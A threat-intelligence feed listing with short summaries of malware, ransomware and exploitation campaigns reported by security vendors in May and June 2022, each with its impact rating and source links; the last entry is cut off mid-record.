Source: https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/
2022-06-08
Fake_cracked_software_spreading_Crypto_Stealing_malware
LOW
+
Intel Source:
Avast
Intel Name:
Fake_cracked_software_spreading_Crypto_Stealing_malware
Date of Scan:
2022-06-08
Impact:
LOW
Summary:
Users who download cracked software risk sensitive personal data being stolen by hackers.
Source: https://blog.avast.com/fakecrack-campaign
2022-06-07
Spam_Email_Contains_BitRat_Malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Spam_Email_Contains_BitRat_Malware
Date of Scan:
2022-06-07
Impact:
LOW
Summary:
Researchers at ISC.SANS have analysed a zipped email attachment containing a very large ISO/EXE file; after the file was executed in a sandbox, it started communicating with a BitRat C2 site.
Source: https://isc.sans.edu/diary/rss/28712
2022-06-07
Black_Basta_Ransomware_targeting_ESXi_servers
MEDIUM
+
Intel Source:
NCC Group
Intel Name:
Black_Basta_Ransomware_targeting_ESXi_servers
Date of Scan:
2022-06-07
Impact:
MEDIUM
Summary:
Black Basta is the latest ransomware gang to add support for encrypting VMware ESXi virtual machines (VMs) running on enterprise Linux servers.
Source: https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
2022-06-07
Mindware_Ransomware
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Mindware_Ransomware
Date of Scan:
2022-06-07
Impact:
MEDIUM
Summary:
Researchers at SentinelOne have analysed Mindware ransomware and its similarities with SFile ransomware, and provided technical indicators.
Source: https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/
2022-06-07
Exploitation_of_ManageEngine_SupportCenter_Plus
LOW
+
Intel Source:
DFIR Report
Intel Name:
Exploitation_of_ManageEngine_SupportCenter_Plus
Date of Scan:
2022-06-07
Impact:
LOW
Summary:
The DFIR Report observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus. The threat actor discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP, and exfiltrated sensitive information using the web shell and RDP.
Source: https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
2022-06-07
WatchDog_Evolves_With_a_New_Multi-Stage_Cryptojacking_Attack
MEDIUM
+
Intel Source:
Cadosecurity
Intel Name:
WatchDog_Evolves_With_a_New_Multi-Stage_Cryptojacking_Attack
Date of Scan:
2022-06-07
Impact:
MEDIUM
Summary:
Cado Labs' honeypot infrastructure was recently compromised by a complex, multi-stage cryptojacking attack.
Source: https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/
2022-06-07
Popping_Eagle_Malware
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Popping_Eagle_Malware
Date of Scan:
2022-06-07
Impact:
MEDIUM
Summary:
Researchers at Palo Alto have identified an unknown piece of malware dubbed Popping Eagle, whose activity includes performing a specially crafted DLL hijacking attack. Researchers also observed the attacker following the DLL hijacking with several network scans and lateral movement steps.
Source: https://unit42.paloaltonetworks.com/popping-eagle-malware/
2022-06-06
WinDealer_malware_shows_extremely_sophisticated_network_abilities
LOW
+
Intel Source:
SecureList
Intel Name:
WinDealer_malware_shows_extremely_sophisticated_network_abilities
Date of Scan:
2022-06-06
Impact:
LOW
Summary:
Researchers have discovered that the malware known as WinDealer, spread by Chinese-speaking Advanced Persistent Threat (APT) actor LuoYu, has the ability to perform intrusions through a man-on-the-side attack.
Source: https://securelist.com/windealer-dealing-on-the-side/105946/
2022-06-06
YourCyanide_Ransomware_Propagates_With_PasteBin_Discord_Microsoft_Links
LOW
+
Intel Source:
Trend Micro
Intel Name:
YourCyanide_Ransomware_Propagates_With_PasteBin_Discord_Microsoft_Links
Date of Scan:
2022-06-06
Impact:
LOW
Summary:
The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number of capabilities, such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
Source: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html
2022-06-06
DeadBolt_Ransomware
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
DeadBolt_Ransomware
Date of Scan:
2022-06-06
Impact:
MEDIUM
Summary:
The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices.
Source: https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html
2022-06-06
Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware
MEDIUM
+
Intel Source:
NetSkope
Intel Name:
Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware
Date of Scan:
2022-06-06
Impact:
MEDIUM
Summary:
Researchers at Netskope Threat Labs have analysed a few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, a red team tool that can be used to simulate real ransomware attacks.
Source: https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs
2022-06-06
Clipminer_Botnet
LOW
+
Intel Source:
Symantec
Intel Name:
Clipminer_Botnet
Date of Scan:
2022-06-06
Impact:
LOW
Summary:
Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clipminer-bitcoin-mining-hijacking
2022-06-06
Travel_Themed_attacks_surges_by_multiple_RATs
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Travel_Themed_attacks_surges_by_multiple_RATs
Date of Scan:
2022-06-06
Impact:
MEDIUM
Summary:
Researchers from Fortinet have noted multiple RAT campaigns using travel-themed lures to target would-be travellers. The RATs include AsyncRAT, NetWire RAT and Quasar RAT.
Source: https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers
2022-06-05
Massive_NDSW_NDSX_Malware_Campaign
MEDIUM
+
Intel Source:
Sucuri
Intel Name:
Massive_NDSW_NDSX_Malware_Campaign
Date of Scan:
2022-06-05
Impact:
MEDIUM
Summary:
Researchers at Sucuri have been tracking a campaign since February 2019, which they call the ndsw/ndsx malware campaign. The malware consists of several layers: the first prominently features the ndsw variable within JavaScript injections, and the second leverages the ndsx variable in the payload.
Source: https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html
2022-06-03
AsyncRAT_targeting_Colombian_Organisations
LOW
+
Intel Source:
Jstnk
Intel Name:
AsyncRAT_targeting_Colombian_Organisations
Date of Scan:
2022-06-03
Impact:
LOW
Summary:
Researcher Jose Luis Sánchez Martínez has analysed campaigns related to AsyncRAT targeting Colombia, in which there are some modifications in TTPs.
Source: https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/#summary
2022-06-03
Zero_Day_Exploitation_of_Atlassian_Confluence
HIGH
+
Intel Source:
Volexity
Intel Name:
Zero_Day_Exploitation_of_Atlassian_Confluence
Date of Scan:
2022-06-03
Impact:
HIGH
Summary:
Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.
Source: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/indicators.csv https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
2022-06-03
POLONIUM_targeting_Israeli_organizations
LOW
+
Intel Source:
Microsoft
Intel Name:
POLONIUM_targeting_Israeli_organizations
Date of Scan:
2022-06-03
Impact:
LOW
Summary:
POLONIUM has targeted, and may have compromised, more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months.
Source: https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/
2022-06-03
UNC2165_Shifts_to_LOCKBIT_to_Evade_Sanctions
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC2165_Shifts_to_LOCKBIT_to_Evade_Sanctions
Date of Scan:
2022-06-03
Impact:
MEDIUM
Summary:
Mandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat cluster that shares numerous overlaps with the threat group publicly reported as "Evil Corp".
Source: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions
2022-06-03
Cobalt_Strike_Beacon_and_other_vulnerabilities_leveraged_to_target_Ukraine_government_bodies
LOW
+
Intel Source:
CERT-UA
Intel Name:
Cobalt_Strike_Beacon_and_other_vulnerabilities_leveraged_to_target_Ukraine_government_bodies
Date of Scan:
2022-06-03
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email targeting Ukrainian government bodies that contains a file named "changes in wages with accruals.docx". The file contains a link to an external HTML object which, when executed, exploits the vulnerabilities CVE-2021-40444 and CVE-2022-30190 and ultimately compromises the system with Cobalt Strike.
Source: https://cert.gov.ua/article/40559
2022-06-02
Follina_zero-day_vulnerability_in_Microsoft_Office_getting_exploited
HIGH
+
Intel Source:
ISC.SANS Cisco Talos Recorded Future Fortinet
Intel Name:
Follina_zero-day_vulnerability_in_Microsoft_Office_getting_exploited
Date of Scan:
2022-06-02
Impact:
HIGH
Summary:
A recently discovered zero-day vulnerability, CVE-2022-30190 in the Microsoft Windows Support Diagnostic Tool (MSDT), made headlines over the past few days. Also known as "Follina", it exists when MSDT is called using the URL protocol from an application such as Microsoft Office or Microsoft Word, or via an RTF file. The vulnerability has been widely exploited in the wild by threat actors, and some of that activity has been attributed to Chinese threat actors.
Source: https://isc.sans.edu/forums/diary/First+Exploitation+of+Follina+Seen+in+the+Wild/28698/ https://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html https://github.com/rl0hani/Multiple-Chinese-State-sponsored-Activity-Groups-likely-exploiting-MSDT-Follina-0-Day https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day
2022-06-02
BITB_attack_impersonating_Indian_government_website
LOW
+
Intel Source:
Zscaler
Intel Name:
BITB_attack_impersonating_Indian_government_website
Date of Scan:
2022-06-02
Impact:
LOW
Summary:
The Zscaler ThreatLabz team recently observed a new Browser-in-the-Browser (BITB) attack impersonating an Indian government website to deliver a sextortion demand, with the threat of releasing sensitive information about victims if they refuse to pay.
Source: https://www.zscaler.com/blogs/security-research/browser-browser-sextortion-scam-makes-victims-pay-imitating-indian-gov
2022-06-02
NSIS_Installer_Malware_Included_with_Various_Malicious_Files
LOW
+
Intel Source:
ASEC
Intel Name:
NSIS_Installer_Malware_Included_with_Various_Malicious_Files
Date of Scan:
2022-06-02
Impact:
LOW
Summary:
The ASEC analysis team recently discovered attackers distributing multiple malicious files with NSIS installers.
Source: https://asec.ahnlab.com/en/34955/
2022-06-02
Yashma_Ransomware_Report_CYFIRMA
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Yashma_Ransomware_Report_CYFIRMA
Date of Scan:
2022-06-02
Impact:
MEDIUM
Summary:
Yashma is a new ransomware seen in the wild since May 2022. This ransomware is the rebranded version of an earlier ransomware named Chaos.
Source: https://www.cyfirma.com/outofband/yashma-ransomware-report/
2022-06-01
Karakurt_Data_Extortion_Group
MEDIUM
+
Intel Source:
CISA
Intel Name:
Karakurt_Data_Extortion_Group
Date of Scan:
2022-06-01
Impact:
MEDIUM
Summary:
Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf
2022-05-31
EnemyBot_targeting_Content_Management_System_servers_and_Android_devices
MEDIUM
+
Intel Source:
AT&T Alien Labs
Intel Name:
EnemyBot_targeting_Content_Management_System_servers_and_Android_devices
Date of Scan:
2022-05-31
Impact:
MEDIUM
Summary:
Researchers at AT&T Alien Labs have identified that EnemyBot is expanding its capabilities, exploiting vulnerabilities from 2022, and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.
Source: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
2022-05-31
CVE_2022_30190_Microsoft_Support_Diagnostic_Tool_(MSDT)_RCE_Vulnerability
MEDIUM
+
Intel Source:
Cyble
Intel Name:
CVE_2022_30190_Microsoft_Support_Diagnostic_Tool_(MSDT)_RCE_Vulnerability
Date of Scan:
2022-05-31
Impact:
MEDIUM
Summary:
Recently, Microsoft discussed a new zero-day vulnerability (CVE-2022-30190) that affects the Microsoft Support Diagnostic Tool (MSDT) and allows attackers to execute arbitrary code by exploiting it.
Source: https://blog.cyble.com/2022/05/31/new-zero-day-exploit-spotted-in-the-wild/
2022-05-31
XLoader_Botnet_new_C&C_Infrastructure
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
XLoader_Botnet_new_C&C_Infrastructure
Date of Scan:
2022-05-31
Impact:
MEDIUM
Summary:
Researchers at Check Point Research have identified the real C&C servers among the thousands of legitimate domains used by the Xloader botnet.
Source: https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/
2022-05-31
WSO2_Vulnerability_exploited_to_install_Linux_compatible_CobaltStrike_Beacons
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
WSO2_Vulnerability_exploited_to_install_Linux_compatible_CobaltStrike_Beacons
Date of Scan:
2022-05-31
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have observed attackers exploiting a WSO2 vulnerability and initiating outbound connections to a malicious Cobalt Strike callback destination and command-and-control (C&C) server IP address.
Source: https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html
2022-05-31
APTC53_or_Gamaredon_new_DDoS_Attack_mission
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
APTC53_or_Gamaredon_new_DDoS_Attack_mission
Date of Scan:
2022-05-31
Impact:
MEDIUM
Summary:
360 Security Brain has detected more frequent network attacks related to the APT-C-53/Gamaredon group. The group has begun to release the open source DDoS Trojan program "LOIC" to carry out DDoS attacks.
Source: https://mp.weixin.qq.com/s/gJFSlpIlbaI11lcClNN_Xw
2022-05-30
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC_Part_II
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC_Part_II
Date of Scan:
2022-05-30
Impact:
MEDIUM
Summary:
Researchers at Fortinet's FortiGuard Labs have shared part two of their analysis of a phishing campaign delivering three fileless malware families onto a victim's device. Once executed, the malware is able to steal sensitive information from that device. It mainly affects Microsoft Windows platform users.
Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware-part-two
2022-05-30
XXL_Malware_distributed_through_Email
LOW
+
Intel Source:
ASEC
Intel Name:
XXL_Malware_distributed_through_Email
Date of Scan:
2022-05-30
Impact:
LOW
Summary:
XXL Malware distributed through Email
Source: https://asec.ahnlab.com/en/34756/
2022-05-28
Magniber_ransomware_targeting_Windows11_users
MEDIUM
+
Intel Source:
360 Total Security
Intel Name:
Magniber_ransomware_targeting_Windows11_users
Date of Scan:
2022-05-28
Impact:
MEDIUM
Summary:
Researchers at 360 Total Security have detected a new attack on Windows 11 users, in which Magniber ransomware is disguised as a Windows 10 upgrade patch package and spread widely.
Source: https://blog.360totalsecurity.com/en/win11-users-beware-magniber-ransomware-has-been-upgraded-again-aiming-at-win11/?web_view=true
2022-05-27
GoodWill_Ransomware
MEDIUM
+
Intel Source:
CloudSEK
Intel Name:
GoodWill_Ransomware
Date of Scan:
2022-05-27
Impact:
MEDIUM
Summary:
Researchers at CloudSEK have analysed the activity of the GoodWill ransomware group, which forces victims to donate to the poor and provide financial assistance to patients in need.
Source: https://cloudsek.com/threatintelligence/goodwill-ransomware-forces-victims-to-donate-to-the-poor-and-provides-financial-assistance-to-patients-in-need/
2022-05-27
Analysis_of_Black_Basta_Ransomware
MEDIUM
+
Intel Source:
IBM Security X-Force
Intel Name:
Analysis_of_Black_Basta_Ransomware
Date of Scan:
2022-05-27
Impact:
MEDIUM
Summary:
Researchers from IBM documented a technical analysis of Black Basta ransomware and provided IoCs. Black Basta first appeared in April 2022.
Source: https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/
2022-05-27
Grandoreiro_Banking_Malware
MEDIUM
+
Intel Source:
Trustwave
Intel Name:
Grandoreiro_Banking_Malware
Date of Scan:
2022-05-27
Impact:
MEDIUM
Summary:
Researchers from Trustwave SpiderLabs have identified a Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in the target countries by sending out tax-themed phishing emails.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season/
2022-05-27
Tandem_Espionage_Campaign
LOW
+
Intel Source:
Inquest
Intel Name:
Tandem_Espionage_Campaign
Date of Scan:
2022-05-27
Impact:
LOW
Summary:
Researcher Dmitry Melikov at Inquest has discovered an interesting campaign distributing malicious documents, which used a download chain as well as legitimate payload-hosting services.
Source: https://inquest.net/blog/2022/05/25/tandem-espionage
2022-05-26
TURLA_new_phishing_based_reconnaissance_campaign
LOW
+
Intel Source:
Sekoia
Intel Name:
TURLA_new_phishing_based_reconnaissance_campaign
Date of Scan:
2022-05-26
Impact:
LOW
Summary:
The Sekoia Threat & Detection Team has exposed a reconnaissance and espionage campaign from the Turla intrusion set against the Baltic Defense College, the Austrian Economic Chamber (which has a role in government decision-making such as economic sanctions) and NATO's eLearning platform JADL, pointing to Russian intelligence interest in the defense sector in Eastern Europe.
Source: https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/
2022-05-26
Deep_Analysis_on_new_version_of_Mars_Stealer_Malware
LOW
+
Intel Source:
XJunior
Intel Name:
Deep_Analysis_on_new_version_of_Mars_Stealer_Malware
Date of Scan:
2022-05-26
Impact:
LOW
Summary:
Security researcher Mohamed Ashraf has analysed a new version (V8) of the Mars Stealer malware. The researcher identified an anti-analysis technique, a different encryption algorithm, a new anti-debug technique, and that the external DLLs are packaged in one zip file.
Source: https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs
2022-05-26
Mirai_malware_variants_doubled_for_Intel_powered_Linux_systems
MEDIUM
+
Intel Source:
CrowdStrike
Intel Name:
Mirai_malware_variants_doubled_for_Intel_powered_Linux_systems
Date of Scan:
2022-05-26
Impact:
MEDIUM
Summary:
CrowdStrike research found that Mirai malware variants compiled for Intel-powered Linux systems doubled (a 101% increase) in Q1 2022 compared to Q1 2021.
Source: https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/
2022-05-26
Threat_actors_using_Browser_automation_framework
LOW
+
Intel Source:
TeamCymru
Intel Name:
Threat_actors_using_Browser_automation_framework
Date of Scan:
2022-05-26
Impact:
LOW
Summary:
Researchers from Team Cymru have noticed and alerted about a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns.
Source: https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/
2022-05-26
SocGholish_Campaigns_and_Initial_Access_Kit
MEDIUM
+
Intel Source:
WalMart
Intel Name:
SocGholish_Campaigns_and_Initial_Access_Kit
Date of Scan:
2022-05-26
Impact:
MEDIUM
Summary:
Researchers from Walmart found that SocGholish has been one of the prominent initial access vectors for threat actors and has also partnered with Evil Corp.
Source: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee
2022-05-25
Spoofed_Purchase_Order_drops_GuLoader_Malware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Spoofed_Purchase_Order_drops_GuLoader_Malware
Date of Scan:
2022-05-25
Impact:
MEDIUM
Summary:
Researchers at Fortinet have analysed a phishing email purporting to be a purchase order from an oil provider in Saudi Arabia; the partial PDF file image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained a GuLoader executable.
Source: https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader
2022-05-25
Unknown_APT_group_targeted_Russia_repeatedly
Low
+
Intel Source:
Malwarebytes
Intel Name:
Unknown_APT_group_targeted_Russia_repeatedly
Date of Scan:
2022-05-25
Impact:
Low
Summary:
Researchers from the Malwarebytes Threat Intelligence Team discovered campaigns by unknown threat actors targeting Russia. The APT group has launched at least four campaigns since late February.
Source: https://blog.malwarebytes.com/malwarebytes-news/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/
2022-05-25
New_variant_of_Nokoyawa_Ransomware
Medium
+
Intel Source:
Fortinet
Intel Name:
New_variant_of_Nokoyawa_Ransomware
Date of Scan:
2022-05-25
Impact:
Medium
Summary:
Researchers at Fortinet have discovered that Nokoyawa ransomware is a new variant of the Nemty ransomware that has been improving itself.
Source: https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up
2022-05-25
Yashma_Latest_version_of_Chaos_Ransomware
Medium
+
Intel Source:
BlackBerry
Intel Name:
Yashma_Latest_version_of_Chaos_Ransomware
Date of Scan:
2022-05-25
Impact:
Medium
Summary:
The BlackBerry Research and Intelligence Team has discovered details of the latest version of the Chaos ransomware line, dubbed Yashma. Though the Chaos ransomware builder has only been in the wild for a year, Yashma claims to be the sixth version (v6.0) of this malware.
Source: https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree
2022-05-25
Web_Skimmers_mimicking_Google_Analytics_and_Meta_Pixel_Code
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Web_Skimmers_mimicking_Google_Analytics_and_Meta_Pixel_Code
Date of Scan:
2022-05-25
Impact:
MEDIUM
Summary:
Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection.
Source: https://www.microsoft.com/security/blog/2022/05/23/beneath-the-surface-uncovering-the-shift-in-web-skimming/#ioc
2022-05-25
Threat_Actor_leverage_Fake_Proof_Of_Concept_to_deliver_CobaltStrike
LOW
+
Intel Source:
Cyble
Intel Name:
Threat_Actor_leverage_Fake_Proof_Of_Concept_to_deliver_CobaltStrike
Date of Scan:
2022-05-25
Impact:
LOW
Summary:
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.
Source: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/
2022-05-24
PDF_delivering_Snake_Keylogger_Malware
Medium
+
Intel Source:
HP Wolf Security
Intel Name:
PDF_delivering_Snake_Keylogger_Malware
Date of Scan:
2022-05-24
Impact:
Medium
Summary:
HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.
Source: https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#
2022-05-24
New_pymafka_malicious_package_drops_CobaltStrike_on_macOS_Windows_Linux
Low
+
Intel Source:
Sonatype
Intel Name:
New_pymafka_malicious_package_drops_CobaltStrike_on_macOS_Windows_Linux
Date of Scan:
2022-05-24
Impact:
Low
Summary:
Sonatype's automated malware detection bots have discovered a malicious Python package, 'pymafka', in the PyPI registry. The package drops Cobalt Strike on Windows and macOS. The name 'pymafka' may sound identical to the popular PyKafka; the package appears to typosquat that legitimate library, a programmer-friendly Apache Kafka client for Python.
Source: https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux
2022-05-24
Hackers_utilize_SwissTransfer_to_deploy_Phishing_Scam
Low
+
Intel Source:
Cofense
Intel Name:
Hackers_utilize_SwissTransfer_to_deploy_Phishing_Scam
Date of Scan:
2022-05-24
Impact:
Low
Summary:
Recently the Cofense Phishing Defence Center noticed a number of emails utilising the SwissTransfer service to achieve successful phishes against recipients. File-sharing services such as WeTransfer, Microsoft OneDrive and Dropbox are a known attack vector that has been used to spread files containing anything from scams to malware leading to ransomware.
Source: https://cofense.com/blog/hackers-utilize-swisstransfer-to-deploy-phishing-scam
2022-05-24
Twisted_Panda_Espionage_Operation
Medium
+
Intel Source:
Checkpoint
Intel Name:
Twisted_Panda_Espionage_Operation
Date of Scan:
2022-05-24
Impact:
Medium
Summary:
The Check Point Research team has detailed a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes, part of the Rostec Corporation. The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months.
Source: https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/
2022-05-23
Emotet getting distributed through Link Files
Low
+
Intel Source:
ASEC
Intel Name:
Emotet getting distributed through Link Files
Date of Scan:
2022-05-23
Impact:
Low
Summary:
ASEC researchers recently discovered Emotet getting distributed through various files including Link Files.
Source: https://asec.ahnlab.com/en/34556/
2022-05-23
Vidar_Malware_distributed_through_fake_Windows11_downloads
Low
+
Intel Source:
Zscaler
Intel Name:
Vidar_Malware_distributed_through_fake_Windows11_downloads
Date of Scan:
2022-05-23
Impact:
Low
Summary:
Researchers from Zscaler came across fraudulent domains masquerading as Microsoft's Windows 11 download portal that attempt to trick users into running trojanized installation files, infecting systems with the Vidar information stealer.
Source: https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing
2022-05-23
XorDdos_targeting_Linux_devices
Medium
+
Intel Source:
Microsoft
Intel Name:
XorDdos_targeting_Linux_devices
Date of Scan:
2022-05-23
Impact:
Medium
Summary:
Microsoft researchers observed a 254% increase in activity of XorDDoS, a stealthy and modular malware used to compromise Linux devices and build a DDoS botnet.
Source: https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/
2022-05-23
Supply_Chain_Attack_targets_GitLab_CI_Pipelines
Medium
+
Intel Source:
SentinelOne
Intel Name:
Supply_Chain_Attack_targets_GitLab_CI_Pipelines
Date of Scan:
2022-05-23
Impact:
Medium
Summary:
Researchers from SentinelLabs identified a software supply chain attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines. The campaign has been dubbed CrateDepression.
Source: https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/
2022-05-20
Lazarus_Group_Exploiting_Log4Shell_Vulnerability
Medium
+
Intel Source:
ASEC
Intel Name:
Lazarus_Group_Exploiting_Log4Shell_Vulnerability
Date of Scan:
2022-05-20
Impact:
Medium
Summary:
Researchers from ASEC discovered the Lazarus group distributing NukeSped by exploiting the Log4Shell vulnerability. The threat actor exploited the Log4j vulnerability on VMware Horizon products to which the security patch had not been applied.
Source: https://asec.ahnlab.com/en/34461/
2022-05-20
Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
Medium
+
Intel Source:
WeiXin
Intel Name:
Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
Date of Scan:
2022-05-20
Impact:
Medium
Summary:
Researchers from 360 Threat Intelligence Center came across attack activity launched by APT-C-24 (SideWinder) in which the threat actor employed new TTPs.
Source: https://mp-weixin-qq-com.translate.goog/s/qsGxZIiTsuI7o-_XmiHLHg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en
2022-05-20
Threat_Actors_exploiting_VMware_vulnerability
Medium
+
Intel Source:
CISA
Intel Name:
Threat_Actors_exploiting_VMware_vulnerability
Date of Scan:
2022-05-20
Impact:
Medium
Summary:
CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-138b
2022-05-20
All_about_ITG23_Crypters
Medium
+
Intel Source:
Security Intelligence
Intel Name:
All_about_ITG23_Crypters
Date of Scan:
2022-05-20
Impact:
Medium
Summary:
IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.
Source: https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/
2022-05-20
BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
Low
+
Intel Source:
ISC.SANS
Intel Name:
BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
Date of Scan:
2022-05-20
Impact:
Low
Summary:
Researchers at ISC.SANS were able to link Bumblebee malware to the EXOTIC LILY threat actor, having observed active TransferXL URLs delivering ISO files for Bumblebee.
Source: https://isc.sans.edu/diary/rss/28664
2022-05-20
Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
Medium
+
Intel Source:
PtSecurity
Intel Name:
Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
Date of Scan:
2022-05-20
Impact:
Medium
Summary:
Analysts at Positive Technologies came across a previously unknown Chinese hacking group, which they have dubbed 'Space Pirates', that targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems.
Source: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id5-2
2022-05-19
VMware_Bugs_Abused_to_Deliver_Mirai
Medium
+
Intel Source:
Barracuda
Intel Name:
VMware_Bugs_Abused_to_Deliver_Mirai
Date of Scan:
2022-05-19
Impact:
Medium
Summary:
Researchers from Barracuda discovered attempts to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was being delivered by abusing these VMware bugs.
Source: https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/
2022-05-19
Emotet_The_journey
Medium
+
Intel Source:
Palo Alto
Intel Name:
